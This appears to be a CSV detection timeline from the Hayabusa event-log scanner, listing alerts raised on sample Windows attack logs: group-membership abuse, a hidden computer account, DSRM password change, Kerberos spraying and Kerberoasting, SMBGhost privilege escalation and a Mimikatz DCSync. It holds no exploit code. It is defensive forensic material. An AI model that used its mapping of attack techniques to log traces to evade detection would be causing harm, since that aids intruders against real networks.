2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx
2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx
2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
